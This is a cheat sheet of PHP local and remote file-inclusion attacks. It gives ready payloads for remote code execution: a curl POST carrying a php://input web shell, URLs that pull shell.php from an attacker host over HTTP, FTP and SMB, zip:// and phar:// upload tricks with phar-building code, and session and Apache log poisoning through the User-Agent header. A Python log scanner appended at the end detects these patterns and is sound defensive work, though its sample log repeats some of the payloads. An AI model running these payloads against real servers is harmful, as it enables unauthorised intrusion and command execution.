File Inclusion
PHP Wrappers
Data
Read file:
RCE:
Input
curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
Expect (not common)
Remote File Inclusion (RFI)
On the attacker's server:
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Using FTP
On the attacker's server:
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=ftp://<OUR_IP>/shell.php&cmd=id
Using SMB
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=\\<OUR_IP>\share\shell.php&cmd=whoami
LFI and File Uploads
Image
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=./profile_images/shell.gif&cmd=id
ZIP
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id
Phar
shell.php
<?php
// Build a phar archive; the file added below is what phar:// resolves inside it.
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
// Minimal stub so the archive is valid; rename the result (e.g. to .jpg) before uploading.
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
Log Poisoning
PHP Session Poisoning
Location of the session file on the server:
/var/lib/php/sessions/sess_<PHPSESSID cookie value>
Payload:
http://<SERVER_IP>:<PORT>/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
http://<SERVER_IP>:<PORT>/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
Server Log Poisoning
Write PHP code into the log file via the User-Agent header:
echo -n "User-Agent: <?php system(\$_GET['cmd']); ?>" > Poison
curl -s "http://<SERVER_IP>:<PORT>/index.php" -H @Poison
Execute command:
http://<SERVER_IP>:<PORT>/index.php?language=/var/log/apache2/access.log&cmd=id
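Added here as a defensive companion to the techniques above (not part of the original cheat sheet): a small Python scanner that pulls the include parameter out of Apache access-log lines and tags the patterns this page lists (stream wrappers, remote schemes, UNC paths, traversal, session/log paths, and percent-encoded PHP tags). The log lines, the 192.0.2.10 attacker host and the `language` parameter name are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache "combined" log lines (not real traffic); 192.0.2.10 stands in for the attacker host.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?language=es HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?language=php://input&cmd=id HTTP/1.1" 200 40 "-" "curl/7.88"',
    '10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?language=zip://./profile_images/shell.jpg%23shell.php&cmd=id HTTP/1.1" 200 40 "-" "curl/7.88"',
    '10.0.0.9 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E HTTP/1.1" 200 40 "-" "curl/7.88"',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /index.php?language=/var/lib/php/sessions/sess_abc&cmd=id HTTP/1.1" 200 40 "-" "curl/7.88"',
    r'10.0.0.9 - - [01/Jan/2024:10:00:06 +0000] "GET /index.php?language=\\192.0.2.10\share\shell.php&cmd=whoami HTTP/1.1" 200 40 "-" "curl/7.88"',
    '10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /index.php?language=http://192.0.2.10:8080/shell.php&cmd=id HTTP/1.1" 200 40 "-" "curl/7.88"',
]

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*"')  # client IP, request target
PATTERNS = [  # (tag, regex applied to the fully decoded parameter value)
    ("php_wrapper", re.compile(r"^(php|data|expect|zip|phar|glob)://", re.I)),
    ("remote_include", re.compile(r"^(https?|ftps?)://", re.I)),
    ("unc_path", re.compile(r"^\\\\[^\\]+\\")),                      # \\host\share\...
    ("traversal", re.compile(r"\.\.[/\\]")),
    ("sensitive_path", re.compile(r"(^|/)(var/log/|var/lib/php/sessions/|proc/self/)", re.I)),
    ("php_code", re.compile(r"<\?php", re.I)),
]

def fully_decode(value, max_rounds=3):
    """Undo stacked percent-encoding so %253C%3Fphp still reveals <?php."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify(value):
    """Return the list of LFI/RFI pattern tags one include-parameter value matches."""
    v = fully_decode(value)
    return [tag for tag, rx in PATTERNS if rx.search(v)]

def scan_log(lines, param="language"):
    """Return (client_ip, raw_value, tags) for each request whose include parameter looks hostile."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        # parse_qs already decodes one percent-encoding layer; classify() handles the rest
        for value in parse_qs(urlsplit(target).query, keep_blank_values=True).get(param, []):
            if tags := classify(value):
                hits.append((ip, value, tags))
    return hits
```

Run `scan_log(SAMPLE_LOG)` to see the six hostile requests tagged; the benign `language=es` request is not reported.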
Wordlists
Webroot path wordlist for Linux
Webroot path wordlist for Windows